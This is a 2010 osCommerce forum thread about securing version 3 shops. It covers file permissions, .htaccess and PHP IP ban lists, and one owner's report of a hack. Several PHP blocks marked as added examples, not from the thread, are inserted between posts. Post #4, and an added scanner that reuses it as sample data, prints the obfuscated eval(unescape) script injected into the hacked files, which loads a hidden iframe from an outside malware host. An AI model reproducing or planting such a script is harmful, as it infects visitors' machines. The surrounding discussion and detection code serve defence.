Security on V3


26 replies to this topic

#1   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 25 September 2010 - 09:32 AM

Security

First I would like to thank the osCommerce team; you have given everyone a chance to get their own online shop without spending a lot of money.

But now to the point of this post: I find it very sad that V3 seems to be a high-risk site. I am no pro, but I do know that if you are building an online shop, security must be at the highest level.
If someone asks about V3 in this forum nothing happens, except answers like "you should know it is a demo, and bla bla bla".
Or they are referred to the security thread on V2, and there are many scripts on the V2 security which do not work on V3, and I think that V2 is also running with security problems.
But anyway, stop crossing these 2 different sites. V2 and V3 are not the same sites; that is why osCommerce made two forums.
I know V3 is a demo site, but it is out and can be downloaded by the entire world, and people are tempted to try it, and are using it.
If it is not safe, someone must take responsibility. You can't just build a site, give it to the whole world saying "it is just a demo, try it, test it", and now one year later do nothing about the serious problem the users who tested it are facing.

I will try to tell what I'm doing to secure my site, and I hope you will do the same in this thread.

1. After install, remove the install folder, do not rename it. REMOVE it.

2. Use FileZilla and give all your files (not folders) chmod 644. Chmod is the file permission; in FileZilla you set this permission by right-clicking on each file and setting its permission to 644.
All files except
DIR_WS_IMAGES_THUMBScarousel.xml if you are using the Carousel.

3. Rename your admin folder and give it chmod permission 744. You will now have to open FileZilla and rename your admin folder back to admin, and set chmod permission back to 755, before you can use your admin site. Then the admin folder and files are only at risk while you are online on your admin site.

4. Banning IP addresses from your website is not the way to solve this problem; it is too big a job and hackers will just get a new IP, by using a dynamic host or a hacked site as their host.
Anyway, I have no idea what else to do, so I used two ways to ban IP addresses from my site.
The .htaccess file in the root, and the one in the /includes folder, look like this at the end.
And I copied the 25.000 IP addresses from www.glodev.com/bannedips.php
The top line ErrorDocument is made so that you are telling your banned visitors why they can't see your site, and who they may contact to open it again.
Just make a simple abuse.html document, saying "you are banned, contact mail@blablabla if you think this is a mistake".
This document has to be located a folder up from where your htaccess file is; if you have no folder up, I will gladly host it for you, for free.
ErrorDocument 403 http://www.yoursite.com/abuse.html
# List from http://www.glodev.com/bannedips.php
SetEnvIfNoCase User-Agent "^Missigua Locator" bad_bot
#SetEnvIfNoCase User-Agent "^PEAR HTTP_Request class" bad_bot
SetEnvIfNoCase User-Agent "^Java/1.4.1" bad_bot
SetEnvIfNoCase User-Agent "^Java/1.5.0" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^Wells Search II" bad_bot
SetEnvIfNoCase User-Agent "^psycheclone" bad_bot
SetEnvIfNoCase User-Agent "^WEP Search 00" bad_bot
SetEnvIfNoCase User-Agent "ia_archiver" bad_bot
deny from env=bad_bot
# Referral spammers
deny from 195.72.159.103
deny from 202.103.208.241
It would be a lot easier if htaccess could point to a global IP ban list, but how to do this is out of my knowledge. (deny from this list www.blablabla.bla/banlist.txt)
I did however find this site http://www.spamhaus.org/lookup.lasso; here you can test if the IP is bad according to Spamhaus.

5. Another way to ban IPs is like this:
You make a banned.php document and put it in the root, where your index.php is located. My banned.php doc looks like this:
<?php
// banned.php: the first section bans single IP addresses, the second bans a range.
$banned = array("174.129.212.24", "220.181.7.202", "123.125.66.92");
// $_SERVER is used instead of the old $HTTP_SERVER_VARS, which newer PHP no longer provides.
$userip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
if (in_array($userip, $banned, true))
{
    // Of course this should link to an html or php file like I did in htaccess, but I am a noob and I don't know how to do it!!
    die("You have no access to this site");
}

$ban_range_low = ip2long("220.181.7.1");
$ban_range_up  = ip2long("220.181.7.201");
$ip = ip2long($userip);
// >= and <= so that both ends of the range (220.181.7.1 and 220.181.7.201) are banned too.
if ($ip !== false && $ip >= $ban_range_low && $ip <= $ban_range_up)
{
    // Of course this should link to an html or php file like I did in htaccess, but I am a noob and I don't know how to do it!!!
    print "You have no access to this site";
    exit();
}
?>
The first section is used to ban single IP addresses, and the second section is used to ban a range of IP addresses.

All you need to do next is to enter this line in your main PHP files, like
index.php
application_top.php
configure.php
and wherever you want to put it.

The line is like this.

  include('banned.php');


These were some of my ideas on how to make V3 safer.
I can only hope you will post some of your safety ideas.

A few things I would like to know the answer to are:

How can we use Security Pro http://addons.oscommerce.com/info/5752 in V3?
I tried, and there are many things that do not match V3.

How can we use SiteMonitor http://addons.oscommerce.com/info/4441 in V3?
I tried, and there are many things that do not match V3.

I see only one way forward: let's try to help each other. V3 is a nice website, it just needs some more security.
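The banned.php idea in the post above, carried a step further as an added example (this is not code from the thread or from osCommerce): one list that holds both single hosts and whole ranges in CIDR notation, one matcher for both, and a real 403 response instead of a plain message. The sample list is constructed here (two single addresses from the post plus the enclosing /24 of its range), ABUSE_CONTACT_PLACEHOLDER stands for your own contact address, and the file is assumed to be included before any output is sent, because header() cannot be called after output has started.

```php
<?php
// Added example, not code from the thread or from osCommerce: a replacement for
// the banned.php above that keeps single addresses and whole ranges in one list
// using CIDR notation, so the two separate ip2long() comparisons are not needed.
// Assumptions: IPv4 only; included from index.php/application_top.php before any
// output has been sent (header() fails once output starts).

// Constructed sample list. The two single hosts are taken from the thread's array;
// the thread's range 220.181.7.1-220.181.7.201 is written here as the enclosing /24.
$BANNED_NETWORKS = array(
    '174.129.212.24/32',
    '123.125.66.92/32',
    '220.181.7.0/24',
);

/**
 * True when the dotted IPv4 $ip falls inside $cidr ("a.b.c.d/n"; a bare address means /32).
 * Malformed input never matches, so one bad list entry cannot lock out every visitor.
 */
function ip_in_cidr($ip, $cidr)
{
    $parts = explode('/', $cidr, 2);
    $net   = ip2long($parts[0]);
    $bits  = isset($parts[1]) ? (int) $parts[1] : 32;
    $addr  = ip2long($ip);
    if ($net === false || $addr === false || $bits < 0 || $bits > 32) {
        return false;
    }
    // Netmask with the top $bits set; -1 << n gives the same low 32 bits on 32- and 64-bit PHP.
    $mask = ($bits === 0) ? 0 : (-1 << (32 - $bits));
    return ($addr & $mask) === ($net & $mask);
}

/** True when $ip matches any entry in $networks. */
function is_banned($ip, array $networks)
{
    foreach ($networks as $cidr) {
        if (ip_in_cidr($ip, $cidr)) {
            return true;
        }
    }
    return false;
}

// REMOTE_ADDR is absent on the command line, so the check is simply skipped there.
if (isset($_SERVER['REMOTE_ADDR']) && is_banned($_SERVER['REMOTE_ADDR'], $BANNED_NETWORKS)) {
    // A real 403 status (not a 200 with a message) is what logs and monitoring will see;
    // ABUSE_CONTACT_PLACEHOLDER stands for the contact address of your own shop.
    header('HTTP/1.1 403 Forbidden');
    header('Content-Type: text/html; charset=utf-8');
    echo '<p>You have no access to this site. Contact ABUSE_CONTACT_PLACEHOLDER if you think this is a mistake.</p>';
    exit;
}
```

Include it the same way as the original (`include('banned.php');`) from the files you want covered. Keep in mind the post's own caveat: a list like this stops repeat visits from known addresses, it does not stop an attacker who simply moves to another host.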

#2   burt

burt

    Code Monkey

  • Community Team
  • 7,754 posts

Posted 25 September 2010 - 09:37 AM

Nice post.  The point of Open Source is to get the community working towards a common goal, it is NOT all down to the core developers.

I read yesterday that filezilla stores ftp details in plain text.  Is that true?
Dummies guide to designing osCommerce 2.3 Click Me

Or maybe a ready made theme for your shop ??

Warning: My posts may contain Horsemeat.

#3   blackwater

blackwater
  • Members
  • 163 posts

Posted 25 September 2010 - 01:58 PM

Most hosts don't support SSH/TLS/SSL FTP so it doesn't matter what ftp client you are using, the default connection is plain text password chat. This in itself does not present a risk unless someone is sniffing your web traffic. To sniff your web traffic they would need a compromised machine where the FTP transfer is taking place up to and including the local network gateway. Also if the web host is compromised this is also a risk.

It's nearly impossible to grab the traffic between these two points unless you are an ISP or something.

As far as FileZilla storing the password in plain text, that is not the case in at least 3.3.4.1.


I really want to ask IndoExport if he was hacked or if there are reports of successful hacks on oscv3. There is a lot of talk that it is buggy, unstable and insecure, and to be used only in test environments. I'm coming to realize that it is probably the most secure OSC version ever after the reported bugs are fixed.

You can't simply browse to an admin application php file like filemanager and get it to work; you must be logged in for the engine to break down and authenticate the specific URLs that are used in admin. So the crux of the matter is preventing logon.

All the tips mentioned above, and a few more, are basic, and seem to do the job very well.

So again, has anyone using v3 been hacked?

#4   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 25 September 2010 - 04:14 PM

Hi blackwater
Yes, my site was hacked; all my files named index.php, menu.php and more (all files with chmod 644) had this line added at the bottom of the files:
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%78%66%65%72%2E%63%6F%6D%2F%3F%32%35%30%30%32%36%32%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
My site would now ask visitors to accept a popup, and this popup would install malware on their PC.
Google blocked my site for 2 days, until I fixed it.
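The injected line quoted above, handled from the clean-up side as an added example (not code from the thread): a small PHP CLI script that walks a copy of the web root, finds files carrying the `<script>eval(unescape('...'))</script>` wrapper, and decodes the %XX payload so the analyst can read what was planted. Decoded, the thread's payload is a `document.write()` of a 1x1-pixel iframe pointing at the baxfer.com address Gergely mentions later in the thread. The function names, the file extensions scanned and the sample files written to the temp directory are all assumptions made for this example.

```php
<?php
// Added example, not code from the thread: a small incident-response check for the
// injection reported above, where a <script>eval(unescape('%..'))</script> line was
// appended to every index.php. It finds that pattern in a directory tree, decodes the
// escaped payload so the analyst can read what it does, and reports the file.
// Assumptions: PHP CLI, pointed at a copy of the web root; only .php/.html/.js are read.

/**
 * Return the JavaScript hidden inside an eval(unescape('...')) wrapper, or null when
 * $contents has none. JS unescape() decodes %XX but leaves '+' alone, so rawurldecode()
 * rather than urldecode() is the matching inverse.
 */
function decode_injected_script($contents)
{
    $re = '/<script>\s*eval\(\s*unescape\(\s*\'((?:%[0-9A-Fa-f]{2})+)\'\s*\)\s*\)\s*;?\s*<\/script>/i';
    if (!preg_match($re, $contents, $m)) {
        return null;
    }
    return rawurldecode($m[1]);
}

/** Walk $root and return path => decoded payload for every file that carries the injection. */
function scan_tree($root)
{
    $hits  = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (!preg_match('/\.(php|html?|js)$/i', $file->getFilename())) {
            continue;
        }
        $decoded = decode_injected_script(file_get_contents($file->getPathname()));
        if ($decoded !== null) {
            $hits[$file->getPathname()] = $decoded;
        }
    }
    return $hits;
}

// Constructed sample: the injected line quoted in the thread, re-joined onto one line,
// appended to an otherwise clean file, next to a file with nothing appended.
$injected = "<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27"
          . "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%78%66"
          . "%65%72%2E%63%6F%6D%2F%3F%32%35%30%30%32%36%32%35%22%20%77%69%64%74%68%3D"
          . "%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));"
          . "</script><!-- uy7gdr5332rkmn -->";

if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/osc-scan-' . getmypid();
    mkdir($dir);
    file_put_contents("$dir/index.php", "<?php echo 'shop'; ?>\n" . $injected . "\n");
    file_put_contents("$dir/default.php", "<?php echo 'shop'; ?>\n");
    foreach (scan_tree($dir) as $path => $payload) {
        echo "INFECTED: $path\n  decoded: $payload\n";
    }
    array_map('unlink', glob("$dir/*"));
    rmdir($dir);
}
```

Run it against a copy of the site taken before anything is cleaned, so the list of infected files and the modification times are preserved as evidence. The regex is deliberately narrow (only this one wrapper); the HTML comment marker at the end of the line, `<!-- uy7gdr5332rkmn -->`, is a second string worth grepping for across the whole tree, since it may appear in files that do not end in .php.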

#5   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 25 September 2010 - 04:37 PM

Can someone help to make Security Pro work with V3? http://addons.oscommerce.com/info/5752
In the install information it says find this in /includes/application_top.php:
// set the application parameters
$configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
while ($configuration = tep_db_fetch_array($configuration_query)) {
  define($configuration['cfgKey'], $configuration['cfgValue']);
}
Sorry, that is not to be found in V3.
After this text insert this:
// FWR Media Security Pro
if ( defined('FWR_SECURITY_PRO_ON') && FWR_SECURITY_PRO_ON === 'true' ) {
  $fwr_security_excludes = array();
  if ( defined('FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON') && FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON === 'true' ) {
    $fwr_security_excludes = explode(',', FWR_SECURITY_PRO_FILE_EXCLUSIONS);
  }
  if ( !in_array(basename($_SERVER['PHP_SELF']), $fwr_security_excludes) ) {
    include('includes/functions/security.php');
  }
}
if ( function_exists('tep_clean_get__recursive') ) {
  // Recursively clean $HTTP_GET_VARS and $_GET
  // There is no legitimate reason for these to contain anything but ..
  // A-Z a-z 0-9 -(hyphen).(dot)_(underscore) {} space
  $HTTP_GET_VARS = tep_clean_get__recursive($HTTP_GET_VARS);
  $_GET = tep_clean_get__recursive($_GET);
  $_REQUEST = $_GET + $_POST; // $_REQUEST now holds the cleaned $_GET and std $_POST. $_COOKIE has been removed.
  fwr_clean_global($_GET); // Change the $GLOBALS value to the cleaned value
}
// END - FWR Media Security Pro
Then upload the includes/functions/security.php file.
Upload and run SecurityPro_installer.php (what does this file do, install something in my MySQL? Since this is a demo version I made many changes in MySQL, so it may damage something; it would be nice if the installation could be done manually).
Delete the SecurityPro_installer.php.

Can someone help make all this work on V3?
Is it even needed on V3?

Edited by IndoExport, 25 September 2010 - 04:50 PM.
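The install snippet quoted in the post above only calls tep_clean_get__recursive(); it does not show what that function does, and the thread never reproduces FWR Media's security.php. As an added example (not the add-on's code), here is an illustrative stand-in that applies exactly the allow-list the snippet's comment states, A-Z a-z 0-9 hyphen dot underscore braces and space, to every key and value in $_GET, recursing into nested arrays. The function names, the clean_and_diff() helper and the sample request are assumptions for this example; the real add-on may log or stop the request rather than silently strip.

```php
<?php
// Added example, not FWR Media's security.php (the thread only quotes the include
// snippet): an illustrative stand-in for tep_clean_get__recursive() that applies the
// allow-list stated in that snippet's comment, A-Z a-z 0-9 hyphen dot underscore {} and
// space, to every key and value in $_GET, recursing into arrays. Anything outside the
// allow-list is dropped. The real add-on may log or abort instead; this only strips.

/** Return $input with every key and string value reduced to the allow-listed characters. */
function clean_get_recursive($input)
{
    if (is_array($input)) {
        $clean = array();
        foreach ($input as $key => $value) {
            // Keys come from the query string too, so they get the same treatment.
            $clean[clean_get_recursive($key)] = clean_get_recursive($value);
        }
        return $clean;
    }
    return preg_replace('/[^A-Za-z0-9\-._{} ]/', '', (string) $input);
}

/** Cleaned copy of $get plus the names of the parameters that were altered, for logging. */
function clean_and_diff(array $get)
{
    $clean   = clean_get_recursive($get);
    $changed = array();
    foreach ($get as $key => $value) {
        if (!isset($clean[$key]) || $clean[$key] !== $value) {
            $changed[] = (string) $key;
        }
    }
    return array($clean, $changed);
}

// Constructed sample request. PHP has already %-decoded the query string by the time it
// reaches $_GET, so the %64%6F%63 style seen in the thread arrives here as plain characters.
$sample = array(
    'products_id' => '31',
    'cPath'       => '2_5',
    'sort'        => "1a'; DROP TABLE products--",
    'page'        => '<script>alert(1)</script>',
    'filter'      => array('id' => '7', 'x' => 'a b{c}'),
);
list($clean, $changed) = clean_and_diff($sample);

if (PHP_SAPI === 'cli') {
    print_r($clean);
    echo "altered parameters: " . implode(', ', $changed) . "\n";
}
```

With the sample above, products_id, cPath and filter pass through unchanged, while sort and page lose their quotes, semicolons and angle brackets and are reported as altered. Two things to keep in mind when wiring something like this in: stripping is not output encoding, so templates still have to escape what they print; and the allow-list is only right for a shop whose GET parameters really are ids and paths like 2_5, which is exactly why the snippet carries FWR_SECURITY_PRO_FILE_EXCLUSIONS for pages (a search form, for instance) that legitimately need other characters.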


#6   Gergely

Gergely
  • Community Team
  • 531 posts

Posted 25 September 2010 - 05:06 PM

Thanks for the advice!

blackwater, on 25 September 2010 - 01:58 PM, said:

So again, has anyone using v3 been hacked?

The Hungarian community built demo shops. Some of my V3 demo stores were attempted but the hack code was wrong. Most V3 users started with V3 alpha 5 and there is no error logger, or they don't visit URL stats. I think a URL logger would be very useful, or everybody has to observe the web server log files. (Visitor web stats are very useful.)

Demo shops are the best way to catch hackers. :-)

If we can use error and URL loggers we can find the attempts. I use the last PHP 5.2 GitHub pack for the demo now, so I can see the errors on the admin side. An error logger is the best thing for security reasons. Hack codes generate errors in most cases. I can join URL logger results with the errors on the time value, so I can catch hackers and IP addresses.
If the hack code could be silent we lose everything. You know RC shops work in this wrong way.

Features:
1. The community can collate the hack codes and prevent attempts
2. The core developers can patch this way
3. The shop can close automatically on errors to prevent the next step of losing the store (We have to know hack errors!)

Edited by Gergely, 25 September 2010 - 05:14 PM.

Header Footer Content Modules
SCM
v3

and some rewrites :-)

#7   blackwater

blackwater
  • Members
  • 163 posts

Posted 25 September 2010 - 05:15 PM

Let's step back a little and see if we can determine the source of the attack. Do you have any clue on how entry was made to your site, e.g. ftp, admin logon, from another shared host etc.?

Secondly

Quote

Yes, my site was hacked; all my files named index.php, menu.php and more (all files with chmod 644) had this line added at the bottom of the files

menu.php does not exist in oscv3 or I can't find it. What is menu.php used for?

#8   Mark Evans

Mark Evans

    Code Monkey Rockstar

  • Core Team
  • 2,516 posts

Posted 25 September 2010 - 05:18 PM

As we work on the 3.x series we will subject it to the same level of security auditing as we have done for 2.3; any issues identified will be fixed to remove the need for installation of contributions such as Security Pro etc.

However I am not aware of any issues with the 3.0 alpha 5 codebase or in the current 3.x codebase. This doesn't mean they don't exist, so if anyone does know of anything which causes security issues then please let someone in the team know so that we can investigate it.
Mark Evans
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)

---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)

#9   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 25 September 2010 - 05:49 PM

blackwater, on 25 September 2010 - 05:15 PM, said:

Let's step back a little and see if we can determine the source of the attack. Do you have any clue on how entry was made to your site, e.g. ftp, admin logon, from another shared host etc.?

Secondly

menu.php does not exist in oscv3 or I can't find it. What is menu.php used for?

Sorry, not menu.php but image.php, general.php, I don't remember all of them; the hacked site is on my laptop at work. No, I have no clue on how entry was made.

#10   blackwater

blackwater
  • Members
  • 163 posts

Posted 25 September 2010 - 05:55 PM

With access to so many files in restricted directories it would appear your admin password was compromised or someone had access to your keyboard.

You probably need a lock and key.

#11   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 25 September 2010 - 07:25 PM

blackwater, on 25 September 2010 - 05:55 PM, said:

With access to so many files in restricted directories it would appear your admin password was compromised or someone had access to your keyboard.

You probably need a lock and key.

I do not know much about how a hacker works, but words like injection attacks give me some idea that by using some post command you can inject a text string into MySQL or directly into a file on a server. I did note that it was only files with the same name that were hacked on my site, e.g. all 6 or 7 index.php and all 3 or 4 default.php files and so on.
And I guess having a computer set up to constantly try to inject a text into commonly used filenames like index and default is what a hacker maybe is spending his miserable life on.
But what do I know, I just don't want this to happen again, and I think security.php is preventing the use of the kind of signs %64%6F%63% that were used in the hack on my site.
But if you are telling me that this is not possible, then I guess someone has my password to my FTP, which I of course have changed by now.

#12   Gergely

Gergely
  • Community Team
  • 531 posts

Posted 25 September 2010 - 08:34 PM

IndoExport, on 25 September 2010 - 07:25 PM, said:

I do not know much about how a hacker works

I think it must generate errors. I suggest using a backend error logger and maybe we can find the security hole.

(I hate baxfer)

Edited by Gergely, 25 September 2010 - 08:39 PM.

Header Footer Content Modules
SCM
v3

and some rewrites :-)

#13   blackwater

blackwater
  • Members
  • 163 posts

Posted 25 September 2010 - 09:36 PM

Mark addressed the issue of adding Security Pro and OSCv3a5.

Considering the fact that this website is on a laptop I would imagine the web server is also on the same platform which opens up a whole host of considerations in running a web server. Not to say it is not properly configured, but I suspect the oSC team would rather support sites hosted on commercial web servers.

Hacker methods are surely arcane and only experts can begin to keep abreast of this. In contrast though with what you said earlier you are now suggesting you were attacked using injection. Can you provide more information on this?

Edited by blackwater, 25 September 2010 - 09:44 PM.


#14   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 26 September 2010 - 07:58 AM

blackwater, on 25 September 2010 - 09:36 PM, said:

Mark addressed the issue of adding Security Pro and OSCv3a5.

Considering the fact that this website is on a laptop I would imagine the web server is also on the same platform which opens up a whole host of considerations in running a web server. Not to say it is not properly configured, but I suspect the oSC team would rather support sites hosted on commercial web servers.

Hacker methods are surely arcane and only experts can begin to keep abreast of this. In contrast though with what you said earlier you are now suggesting you were attacked using injection. Can you provide more information on this?

My site is hosted at one.com. I just downloaded my hacked site with FileZilla when I was at work, and I forgot my laptop at work.
I do not know how I was attacked, I'm no expert in this. It may have been one of my laptops; it may have had malware on it, and that way someone stole my password.
They have all been scanned with Ad-Aware; small things were found, but nothing serious I think.

The reason I started this post was in the small hope that osCommerce users would post their tips on how to make the V3 site safer.

#15   blackwater

blackwater
  • Members
  • 163 posts

Posted 26 September 2010 - 01:46 PM

Based on what we have learned so far, the scenario might have been like this. FTP password to site was hacked via malware on laptop. A PHP script was uploaded to site and then executed remotely which then searched for specific files and planted Javascript code and then deleted itself.

The defense against this is obviously a clean machine that is used for FTP transfers and not used for browsing the web.

Change the FTP password regularly.

On the server side:

- Restrict FTP access to specific IP address(es).
- Restrict MySQL remote access to specific IP address(es).
- Disable directory listings.

In addition, set permissions to directories 755, files 644 and configure.php read-only by owner.

Password protect the admin directory.

Protect the work, download, and temp directories with htaccess (these, except "temp" created by the SP add-on, should already be protected). All the other directories are protected by the default installation.

Items like Security Pro where changes to the core are necessary are not recommended at this time.

Security add-ons that run as cron jobs or otherwise external to the cart should be OK.

#16   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 27 September 2010 - 04:41 PM

Thanks a lot for all your help blackwater

Edited by IndoExport, 27 September 2010 - 04:42 PM.


#17   IndoExport

IndoExport
  • Members
  • 22 posts

Posted 27 September 2010 - 04:45 PM

How is the htaccess to protect the work, download, and temp directories scripted?
Like this?
<Files *>
Order Deny,Allow
Deny from all
</Files>
Temp, do you mean templates?

Edited by IndoExport, 27 September 2010 - 04:52 PM.


#18   blackwater

blackwater
  • Members
  • 163 posts

Posted 27 September 2010 - 08:45 PM

Yes, that is the code you would use for catalog/temp if it exists (not template). All the other directories should already have an .htaccess from installation (pub, download, includes, work).

On a side note, you mentioned scanning using Ad-Aware; well, you will need more powerful tools than that to find the more insidious malware.

Edited by blackwater, 27 September 2010 - 08:58 PM.
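The server-side checklist from blackwater's post #15 (directories 755, files 644, configure.php read-only by owner) and the Deny-from-all .htaccess from posts #17 and #18, turned into a read-only audit as an added example (this is not code from the thread or from osCommerce). It walks a catalog directory, reports every permission that deviates from the checklist, and reports any of the directories named in the thread (work, download, temp, pub, includes) that lack an .htaccess with a `Deny from all` line. The function names, the PROTECTED_DIRS list and the constructed sample tree it builds when no path is given are assumptions for this example; it changes nothing on disk apart from that sample tree.

```php
<?php
// Added example, not code from the thread or from osCommerce: a read-only audit of the
// server-side checklist in blackwater's posts above (directories 755, files 644,
// configure.php read-only, and a Deny-from-all .htaccess in the directories that must
// not be served). It only reports; nothing is chmod'ed or rewritten.
// Assumptions: PHP CLI on the web server, or on a copy that preserves permissions;
// "protected" means the .htaccess contains the "Deny from all" line quoted in the thread.

$PROTECTED_DIRS = array('work', 'download', 'temp', 'pub', 'includes');

/** Permission bits of $path as the familiar three-digit octal string, e.g. "644". */
function perm_string($path)
{
    return substr(sprintf('%o', fileperms($path)), -3);
}

/** True when $dir/.htaccess has a "Deny from all" line (Apache 2.2 syntax, as in the thread). */
function htaccess_denies_all($dir)
{
    $file = $dir . '/.htaccess';
    if (!is_file($file)) {
        return false;
    }
    return (bool) preg_match('/^\s*Deny\s+from\s+all\s*$/mi', file_get_contents($file));
}

/** Findings for $root as human-readable strings; an empty array means the checklist passed. */
function audit_tree($root, array $protected)
{
    $findings = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST);
    foreach ($it as $path => $info) {
        $perm = perm_string($path);
        if ($info->isDir()) {
            if ($perm !== '755') {
                $findings[] = "$path: directory is $perm, expected 755";
            }
        } elseif ($info->getFilename() === 'configure.php') {
            // "Read-only by owner": no write bit for anyone.
            if (fileperms($path) & 0222) {
                $findings[] = "$path: configure.php is writable ($perm), expected read-only";
            }
        } elseif ($perm !== '644') {
            $findings[] = "$path: file is $perm, expected 644";
        }
    }
    foreach ($protected as $name) {
        $dir = "$root/$name";
        if (is_dir($dir) && !htaccess_denies_all($dir)) {
            $findings[] = "$dir: no .htaccess with 'Deny from all'";
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    if (isset($argv[1])) {
        $root = rtrim($argv[1], '/');
    } else {
        // No path given: build a constructed sample tree with deliberate mistakes in it.
        $root = sys_get_temp_dir() . '/osc-audit-' . getmypid();
        mkdir("$root/work", 0755, true);
        mkdir("$root/includes", 0755);
        file_put_contents("$root/includes/configure.php", "<?php\n");
        chmod("$root/includes/configure.php", 0644);   // writable by owner: flagged
        file_put_contents("$root/includes/.htaccess", "Order Deny,Allow\nDeny from all\n");
        chmod("$root/includes/.htaccess", 0644);
        file_put_contents("$root/index.php", "<?php\n");
        chmod("$root/index.php", 0666);                // world-writable: flagged
        chmod("$root/work", 0777);                     // 777 and no .htaccess: flagged twice
        echo "sample tree left under $root\n";
    }
    foreach (audit_tree($root, $PROTECTED_DIRS) as $finding) {
        echo $finding, "\n";
    }
}
```

Run it as `php audit.php /path/to/catalog` on the server itself, because permissions copied down over FTP are not the server's. One caveat on the .htaccess check: `Order Deny,Allow` / `Deny from all` is Apache 2.2 syntax; on Apache 2.4 it only keeps working while mod_access_compat is loaded, and the native equivalent is `Require all denied`, so extend the regex if your host has moved to the newer form.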


#19   driftwood

driftwood
  • Members
  • 226 posts

Posted 25 March 2011 - 02:10 PM

Using htaccess won't protect you from these hacks, as the hack is not entering your site via FTP. Sure, you can block the IP, even the referer, but that's after the event.

The problem here is an XSS attacker finding holes in your site code to exploit; 99.99% of the time that's nothing to do with the developers of OSC.

A good read - http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

If you simply add any contribution to your site it will end up very rich pickings.
-----------------------------------------------------------------------------
OSC user for years and no coder, so I've earned my stripes.

Feel free to private message me.

#20   Taipo

Taipo
  • Members
  • 757 posts

Posted 27 March 2011 - 12:13 AM

The problem seems to me to be in the migration rather than OSC3. If your 2.x oscommerce site was hacked and there were malicious files uploaded into the image directory for example, then if you migrate to version 3.x and install across the top of 2.x, or use the same image directory, then those php files will still remain.

I think it is best practice to completely start again if you intend to upgrade from 2.2 to 2.3.1 or higher. That is by far the safest method.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
- Aegis Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes